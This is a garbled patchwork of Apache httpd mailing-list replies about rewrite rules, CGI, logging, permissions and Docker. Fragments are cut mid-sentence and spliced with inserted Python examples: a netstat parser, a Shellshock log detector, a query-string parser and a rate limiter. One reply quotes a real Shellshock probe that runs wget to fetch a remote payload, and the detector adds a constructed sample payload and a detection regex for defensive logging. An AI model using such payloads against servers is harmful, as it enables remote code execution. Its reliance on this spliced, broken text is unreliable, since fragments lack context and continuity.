g of HTTP requests when invoked via the CGI protocol.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
ell scripts (that is, a program written
in sh/bash/ksh/zsh or similar languages that adhere to the POSIX 1003 shell
standard). That can only lead to much wasted time, bugs, and security
holes. Yes, it is technically possible to handle an HTTP POST request using
such a shell. But you shouldn't do
. Run
that now so you learn what to look for. Find the line that contains ":80"
in the local address column and "LISTEN" in the state column. Next to that
will be the PID and process name.
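The "find the line with :80 and LISTEN, then read the PID/program" step described above, as an added example that is not part of the original post: a small parser over `netstat -tlnp` style output that picks out whoever is listening on a given port. The sample output is constructed here, not captured from a real host; the column layout it assumes is that of Linux `netstat -tlnp`, including the `-` that appears in the PID column when the caller lacks permission to see the owning process.

```python
# Constructed sample of `netstat -tlnp` output (Linux); not from a real host.
SAMPLE_NETSTAT = """Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1034/master
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      2213/httpd
tcp        0      0 10.0.0.5:8080           0.0.0.0:*               LISTEN      3301/java
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::443                  :::*                    LISTEN      2213/httpd
"""


def listeners(netstat_output, port):
    """Return [(local_address, pid_or_None, program)] for sockets in the
    LISTEN state whose local port equals `port`.

    Columns assumed (netstat -tlnp): Proto Recv-Q Send-Q Local Foreign State PID/Program.
    The port is taken from the text after the LAST colon so IPv6 forms such
    as ':::443' are handled; a PID column of '-' yields (None, '').
    """
    hits = []
    for line in netstat_output.splitlines():
        fields = line.split()
        # header/blank lines have no LISTEN in the State column
        if len(fields) < 7 or fields[5] != "LISTEN":
            continue
        local = fields[3]
        if local.rsplit(":", 1)[1] != str(port):
            continue
        pid, _, prog = fields[6].partition("/")
        hits.append((local, int(pid) if pid.isdigit() else None, prog))
    return hits


if __name__ == "__main__":
    for local, pid, prog in listeners(SAMPLE_NETSTAT, 80):
        print(f"{local} is served by pid={pid} program={prog}")
```

Run it against real output with `netstat -tlnp | python3 -c 'import sys; ...'` or simply paste the output into `SAMPLE_NETSTAT`; if the program column comes back as `-`, rerun netstat as root, since unprivileged users cannot see other users' process names.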
hree days ago and
automatically blacklisted by my firewall because the HTTP request specified
an invalid HTTP "Host:" header.
"-"
> "Apache/2.4.6 (Red Hat Enterprise Linux) PHP/5.4.16 (internal dummy
> connection)"
>
It's checking whether your web server allows the OPTIONS command which
might allow other forms of attacks to succeed. I strongly recommend
disallowing that HTTP command. Easiest
ot
given that you already had to grant the web server access to your home
directory in order to support your requirements. The concern now is whether
user accounts on your machine other than the one running the apache web
server can exploit those looser permissions.
ial information leak that could
theoretically be used to launch an attack. Whether that's a concern for you
depends on a lot of factors.
he public execute bit is not set, or
the group execute bit is not set or if set apache is not a member of that
group, or the user execute bit is not set or if set apache is not running
as that user.
ms before.
>
> I doubt whether Perdition can help me out on my current test ?
>
>
What is the relevance of the Perdition mail proxy to your current problem?
It seems to me that you don't understand the difference between the SMTP
and HTTPD protocols. Which is why you should h
oftware).
> I expect keeping the Host clean for running VirtualBox ONLY.
>
Then you need another system that handles all traffic to/from your single
fixed/static IP address, on which you can run a "reverse proxy" that forwards
traffic to the appropriate VMs on your VirtualBox host.
be relevant:
Changes with Apache 2.4.2
*) SECURITY: CVE-2012-0883 (cve.mitre.org)
envvars: Fix insecure handling of LD_LIBRARY_PATH that could lead to
the
current working directory to be searched for DSOs. [Stefan Fritsch]
Include any relevant configuration
options, error messages, and how to reproduce the problem.
configurable values for ServerLimit, ThreadsPerChild, etc.
arly have other
customizations in place since "which httpd" would not normally show the
output you reported. So it's possible your $PATH also contains atypical
entries that may cause httpd 2.2 to be found first even after you run "brew
link".
. The value logged by %L in the access log
cannot be found in the error log. The %L value is clearly a hash of some
sort (e.g., SHA1 value of the incoming IP address and port) converted to
ASCII. This looks like a bug to me.
(null)
bytes. So if you want to capture binary data you'll want to use the fixed
version I attached to this problem report:
https://bz.apache.org/bugzilla/show_bug.cgi?id=57045
atic files. So I suspect there is something
unusual about your apache config that worked fine, possibly by accident,
under version 2.2 and results in incorrect output under version 2.4. Are
you using any third-party modules? Can you employ a "divide and conquer"
debug strategy to eliminate
cesses? It seems to me you're confusing a guideline (e.g., minimize the
number of processes per container) for a mandate (e.g., have only one
process per container).
pect to recognizing
and dispatching incoming requests as well as dealing with housekeeping
chores may mandate one or more processes or threads for activities other
than handling an HTTP request.
sses;
including the Apache HTTP server.
Take a look at your apachectl script for the equivalent block of code then
look at the contents of the file it refers to. You'll want to ensure you
have set and exported the same variables. Probably the easiest way is to
run the same "." (d
binary. If you choose to invoke the
httpd binary directly without the aid of a wrapper script it simply becomes
your responsibility to pass all necessary and appropriate arguments; e.g.,
-f to specify where the config file can be found.
o
> that.
>
Works for me. Let us know if it doesn't work for you.
On Sat, Oct 24, 2015 at 11:31 PM, Nick Kew wrote:
> On Sat, 2015-10-24 at 21:11 -0700, Kurtis Rader wrote:
> > I'm going to assume that by "single process" you meant "single user".
>
> If you read the docs, you'll find single process mode
> de
mailing list to know how to configure a Docker container to
die if the Apache HTTP server dies. Nor how to start an Apache HTTP server
daemon and have its output written to stdout and stderr in a manner that
can be collected by whatever software monitors the output of a Docker
virtual machine.
tes
> libreport-plugin-kerneloops.x86_64 2.6.2-4.fc22 @updates
> [root@casablanca ~]#
>
> Here, the kernel 4.2.3-200.fc22 is installed and the machine according to
> uname -r booted from it.
>
> -
>
> Does the BIOS boot partition make the difference? Can anybody explain
> this strange behaviour?
>
> Thanks for your attention.
>
> suomi
>
> -
>
>
On Fri, Oct 16, 2015 at 6:23 PM, Good Guy wrote:
> On 17/10/2015 01:41, Kurtis Rader wrote:
>
>>
>> That is not correct, Good Guy. Linux, and pretty much any operating
>> system, uses binary programs. Which means programs that consist of machine
>> executable op co
common directory for all the files you
need is root ("/").
P.S., There are very fringe, unusual, computers that directly execute byte
code for languages like Forth and Java rather than machine language as
typically understood by most CPUs. But even those systems are effectively
executing binaries.
>
The [OR] on the second RewriteCond does nothing since it isn't followed by
another RewriteCond. You also don't need the first RewriteCond since by
definition an empty HTTP_REFERER won't match the pattern.
with whatever options meet
your requirements. For example, the install dir might be
/usr/local/apache24_testing or some such that exists on both of your
systems. Building from source on Linux is trivial (unlike on MS Windows).
the file /data/apache/patch2.2/lib/libaprutil-1.so exist? Do the other
shared object pathnames exist? If they exist run the "file" command against
them and the httpd binary. Are they all the same architecture? Especially,
are they all 32 or 64 bit binaries? If they're 64-bit binaries does the
system you're trying to run them on support 64-bit binaries?
ke ap_table with key value between modules. is it possible?
> Thanks.
>
You are unlikely to get an answer on this mailing list. Even though
developers (like myself) read this mailing list it isn't the correct forum
for such questions. Check out the "Third-Party Module Authors'
wrong with what you showed
us other than you probably should be using %{HTTP_HOST} and the RewriteRule
statement is needlessly complicated (but then so are most of the examples I
saw from the google search recommended).
"
yields a bunch of results that suggest you're running apache on FreeBSD.
Further, the setfib command runs a program with a specific routing table.
Presumably this has something to do with IP firewalls on FreeBSD. So asking
this question on a FreeBSD mailing list or forum is more likely to ge
ache http server is on Windows machine.
>
If you are trying to use a module that is not part of the core Apache HTTP
server and which is only available on MS Windows you should ask for help on
whatever mailing list or web site is devoted to supporting that module.
>
> Please help me out here. This is very crucial for my project and deadline
> is already passed. :(
>
> Please let me know in case of any other queries.
>
> Thanks & Regards,
> *Ashish Mistry*
>
rome/44.0.2403.157 Safari/537.36"
>
The common log format (CLF), which is the default, leaves a lot to be
desired. I highly recommend using a CustomLog format that includes, at a
minimum, "%{Host}i" so that the client provided HTTP host header is part of
the log message. This is what
.example.com:80
>
> My DNS has A records
>
> example.com -> myIP
> *.example.com -> myIP
>
> myIP is the same for both records.
>
> site1.example.com works fine and goes to the correct site.
>
> site2.example.com works fine and
only provides static content. A lower value (in the single digits) might,
if you're lucky, mitigate a DDOS attack enough to keep your server from
melting down.
one request ended up in 200 lines of
> garble (I cleared the log beforehand).
>
That is often the case. Which is why it is important to perform one
experiment at a time; i.e., issuing one client request then saving the log
files for analysis. If you do not minimize the number of variables (e.
by "correctly on /app"? Nowhere in the data you've
provided so far, in particular the Apache virtual host configuration, is a
URI prefix of "/app" referenced. If you're using that as a synonym for
"/projects/CS32Brewer" please say so.
. For example,
LoadModule dumpio_module libexec/apache2/mod_dumpio.so
LogLevel trace6
DumpIOInput On
DumpIOOutput On
LogLevel dumpio_module:trace7
I then issue a series of carefully constructed HTTP requests meant to
eliminate irrelevant details and examine the error log for clues.
configuration of the
program. As far as I know the Apache httpd project adheres to that rule.
equests the app makes"? Is it a
web browser or something else? And if something else please provide more
details. What do you mean by "the remote IP address is shown as
localhost:80"? Shown where? By what program?
n other words the flow of requests and
responses is not clear from your description.
t what is passed to the subprocess. I
would open a second issue asking that the documentation make it clear when
directives like DocumentRoot have the side effect of setting an environment
variable.
tpd.apache.org/docs/2.4/mod/core.html#documentroot ) doesn't even
mention the corresponding env var. I think that's a documentation bug.
d.apache.org/docs/2.4/mod/mod_cgi.html which in turn links to
the official specification at http://www.ietf.org/rfc/rfc3875.
pecially in a well
written program like Apache HTTPD. A well written program will normally
check whether the open (or any syscall which returns a file descriptor)
failed and refuse to use the -1 value as if it were a valid file descriptor
number. So I would be surprised if increasing that value resol
As user2 repeat the ls command:
ls -l /test/file
You should get a "permission denied" error.
As user1 restore the "x" permission and remove the "r" permission from the
directory:
chmod 511 /test
As user2 repeat the ls command:
ls -l /test/file
It should work this time.
d posting to
> stackoverflow, and the best idea given was creating a symlink in the
> container. Is there a way to do this officially?
>
> http://stackoverflow.com/posts/32013582
>
FYI, That URL isn't valid; it results in a "page not found" error from
Stack Overflow.
apache2/test-access.log.%Y-%m-%d 86400 " krader_custom
ErrorLog "|/usr/sbin/rotatelogs -c -f -l -L
/private/var/log/apache2/test-error.log
/private/var/log/apache2/test-error.log.%Y-%m-%d 86400"
Obviously you'll want to substitute another program for
/usr/sbin/rotatelogs in the
nsultant to help you with these issues. It's
only because your questions up to this point have had fairly obvious
answers and didn't require actual knowledge of your web server environment
that we could help.
s. Information is passed to
them from the web server via environment variables and, for POST requests,
standard input. You pass arguments to a CGI script via the URI query
string. See https://en.wikipedia.org/wiki/Common_Gateway_Interface
try for the most recent attack the above rule caught (I
have a custom log format):
2015-06-28T06:08:02 1435496882.639185 400 shellshock-exploit 6491 616
194.8.18.88 75.101.21.75 "GET / HTTP/1.0" "() { :;}; /bin/bash -c \"wget -O
/tmp/bbb dprftp.asuscomm.com/novo.php?ip=37352e3130312e32312e3735\""
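The log entry above shows what a Shellshock probe looks like once the request is logged with a custom format that captures the User-Agent header. The following is an added example, not the poster's firewall rule (which is not shown on this page): detection logic run over sample log lines of the same shape. The log format it parses (`time epoch status tag bytes bytes client_ip server_ip "request" "user-agent"`) is assumed to mirror the custom format in the post, the sample lines are constructed with RFC 5737 documentation addresses and example.com rather than real traffic, and the only signature it looks for is the `() {` bash function-definition marker that every Shellshock payload must start with.

```python
import re

# Shellshock payloads (CVE-2014-6271 family) begin with a bash function
# definition smuggled in through an environment variable, e.g. the
# User-Agent header that mod_cgi exports as HTTP_USER_AGENT. The marker is
# "() {" with optional whitespace between the parentheses and the brace.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# One double-quoted log field, honouring backslash-escaped quotes inside it.
QUOTED_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')


def is_shellshock(text):
    """True if `text` carries the "() {" function-definition marker."""
    return SHELLSHOCK_RE.search(text) is not None


def parse_line(line):
    """Parse one line of the assumed custom format:
    time epoch status tag bytes_in bytes_out client_ip server_ip "request" "user-agent"
    Returns None for lines that do not fit (short lines, missing quoted fields)."""
    unquoted = line.split('"', 1)[0].split()
    quoted = QUOTED_RE.findall(line)
    if len(unquoted) < 8 or len(quoted) < 2:
        return None
    return {
        "time": unquoted[0],
        "status": int(unquoted[2]),
        "tag": unquoted[3],
        "client_ip": unquoted[6],
        "request": quoted[0],
        "user_agent": quoted[1],
    }


def find_shellshock(lines):
    """Return [(client_ip, field_name, payload)] for every line whose request
    line or User-Agent contains the Shellshock marker."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("request", "user_agent"):
            if is_shellshock(rec[field]):
                hits.append((rec["client_ip"], field, rec[field]))
    return hits


# Constructed sample lines (not real traffic); the first copies the shape of
# the payload quoted in the post, the third uses the no-space variant "() {:;}".
SAMPLE_LOG = [
    '2015-06-28T06:08:02 1435496882.639185 400 shellshock-exploit 6491 616 '
    '198.51.100.7 203.0.113.10 "GET / HTTP/1.0" '
    '"() { :;}; /bin/bash -c \\"wget -O /tmp/x http://example.com/x\\""',
    '2015-06-28T06:09:11 1435496951.112233 200 - 1024 512 '
    '198.51.100.8 203.0.113.10 "GET /index.html HTTP/1.1" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/38.0"',
    '2015-06-28T06:10:45 1435497045.000001 404 - 300 200 '
    '198.51.100.9 203.0.113.10 "GET /cgi-bin/test.cgi HTTP/1.1" '
    '"() {:;}; echo vulnerable"',
]

if __name__ == "__main__":
    for ip, field, payload in find_shellshock(SAMPLE_LOG):
        print(f"{ip} via {field}: {payload}")
```

Only headers the log format actually records can be scanned this way; a payload delivered in Cookie or Referer would need those headers in the CustomLog as well, which is the point of the post's recommendation to log more than the common log format does.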
James, keep in mind that in a given context (e.g., a .htaccess file) all of
the directives are parsed and processed before being applied to the current
request. So, as Zimmi points out, having more than one RewriteEngine
doesn't make any sense. The same is true for RewriteBase.
&ref=books'
so it's hard to know exactly what is happening.
a.com left intact
Okay, the Apache documentation says that the Redirect directive has
precedence over Alias and ScriptAlias directives. It doesn't say anything
about RewriteRule directives. But I'm willing to bet that's the problem
since it would be strange to use both RewriteRule and Re
y/?testing=123" do you get a 403 Forbidden
status in response?
line at the top of your .htaccess? If
not try adding one. You probably also want "RewriteBase /" as the next line.
me section
were working. It was just this one rule that wasn't working. Which is it?
At this point you should probably include your entire .htaccess and
httpd.conf files (stripped of anything sensitive like paths to security
certificates) as attachments.
ug logging. Use tools like
the curl command to execute the HTTP requests so that you have total
control over the URI and headers being passed to your server.
On Sat, Jun 27, 2015 at 1:58 PM, James Moe wrote:
> On 06/27/2015 12:00 PM, Kurtis Rader wrote:
> >
> >
> I guess this build did not include dumpio_module. Adding the above
> produced no additional logging.
Did you add or uncomment the appropriate LoadModule line?
's what I use to debug situations like this. Which is fine for short
durations. But for longer term tracking of requests to your server it's
better, and less resource intensive, if you simply define a CustomLog that
includes the "%r" format string so that the entire URI ends up in the
access log.
?
A "Referer:" header is not the URI sent to the web server. It's typically
added by the web browser to indicate the URI from which the request
originated. Your error log should include the entire URI, including query
string, sent to your server.
06-26T18:01:39 1435366899.344840 200 - 228749 61272 ::1 localhost "GET
/?app=ecom&ns=catshow&ref=books HTTP/1.1" "curl/7.37.1"
e the rewrite rule in the wrong container (i.e., server, location,
directory, virtual host).
P.S., If you want to match the query string literally rather than as a
pattern which matches a subset of the query string you should preface the
pattern with an equal-sign:
RewriteCond %{QUERY_STRING} =
On Fri, Jun 26, 2015 at 1:36 PM, Kurtis Rader wrote:
> My question for James would be how do you know the query string has the
> parameters in that exact order? Unless the query string has been
> hand-crafted you cannot assume the parameters will appear in any specific
> order
order. Also, your pattern doesn't handle the case where the parameters are
separated by semicolons (which is a legal alternative to ampersand). In
general matching against QUERY_STRING is very difficult to do in a robust
manner.
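The three objections raised above (parameter order is not fixed, `;` is a legal separator alongside `&`, and matching QUERY_STRING with a regular expression is fragile) are easiest to see side by side in code. What follows is an added example and not code from the post: a naive prefix regex in the style of a RewriteCond pattern for the `app=ecom&ns=catshow&ref=books` query string seen earlier in the thread, next to a parser that decodes the query string into name/value pairs and checks for the wanted parameters regardless of order, separator or percent-encoding. The naive pattern and the sample query strings are constructed here for illustration.

```python
import re
from urllib.parse import unquote_plus

# A naive check in the spirit of "RewriteCond %{QUERY_STRING} app=ecom&ns=catshow&ref=books":
# one fixed order, '&' only, no decoding. (Constructed for this example.)
NAIVE_RE = re.compile(r'^app=ecom&ns=catshow&ref=books')


def naive_match(qs):
    return NAIVE_RE.match(qs) is not None


def parse_query(qs):
    """Split a query string on '&' OR ';' (both are legal separators),
    percent-decode names and values, and keep repeated names as lists."""
    params = {}
    for part in re.split(r'[&;]', qs):
        if not part:
            continue
        name, _, value = part.partition('=')
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def has_params(qs, wanted):
    """True when every name=value in `wanted` is present, in any order,
    with either separator and any percent-encoding of the value."""
    params = parse_query(qs)
    return all(v in params.get(n, []) for n, v in wanted.items())


WANTED = {"app": "ecom", "ns": "catshow", "ref": "books"}

# Constructed query strings exercising the cases the post warns about.
CASES = [
    "app=ecom&ns=catshow&ref=books",       # the one order the naive regex accepts
    "ref=books&app=ecom&ns=catshow",       # same parameters, different order
    "app=ecom;ns=catshow;ref=books",       # semicolon separators
    "app=ec%6Fm&ns=catshow&ref=books",     # percent-encoded value
    "app=ecom&ns=catshow&ref=books&x=1",   # extra trailing parameter
    "app=ecom&ns=catshow",                 # a wanted parameter is missing
]

if __name__ == "__main__":
    for qs in CASES:
        print(f"{qs:38} naive={naive_match(qs)!s:5} robust={has_params(qs, WANTED)}")
```

The robust check is what you would put behind a RewriteMap program or in the application itself; if the decision has to stay inside httpd, the post's later suggestion of ModSecurity, which parses arguments into ARGS:name variables for you, is the closer fit than a bare QUERY_STRING regex.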
ft from the Ubuntu upgrade is
interfering. You may need to remove packages then manually remove any
unexpected files related to those packages that are still in the filesystem
before retrying the install.
lematic on MS-Windows due to how CLI arguments
are parsed. I strongly recommend using only forward slashes in file paths
whenever possible and never mix forward and back slashes as path separators.
P.S., This type of problem is a good example of why you want to avoid
"shelling out" to a
ustralia?
Because that would yield a local timestamp of 786326400, 1994-12-02
00:00:00 local time. I would recommend searching for values in the
range 786297600 +/- n * 3600 for n in -12..+12.
press_test_cookie=WP+Cookie+check
```
rule like this
RewriteCond %{QUERY_STRING} !=""
RewriteRule ^ %{REQUEST_URI}? [R=302,L]
When I issue a "GET /hello.php?whatever=1" with either version I get a 302
response with
Location: http://www.skepticism.us/hello.php
Also, if you don't want to match non-whitespace I recommend
convinced you that implementing this logic in the web
server is the wrong place to do it then I would recommend ModSecurity:
http://www.modsecurity.org/.
--
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
```python
import time

class RateLimiter:
    def __init__(self, rate, per):  # added so the fragment runs stand-alone
        self.rate, self.ratio = float(rate), float(rate) / float(per)
        self.allowance, self.last_check = float(rate), time.time()

    def exceeded(self):
        """Token bucket check: True if the rate limit has been exceeded."""
        now = time.time()
        time_delta = now - self.last_check
        self.last_check = now
        self.allowance += time_delta * self.ratio  # refill at rate/per per second
        if self.allowance > self.rate:
            self.allowance = int(self.rate)  # throttle
        if self.allowance < 1.0:  # bucket empty: this request exceeds the rate
            return True
        self.allowance -= 1.0
        return False
```
ystems) but verified it with my MS-Windows
Vista virtual machine. There is probably a GUI (graphical user interface)
means of ascertaining the same data but I have no idea how to do so since I
generally prefer old-school CLI methods.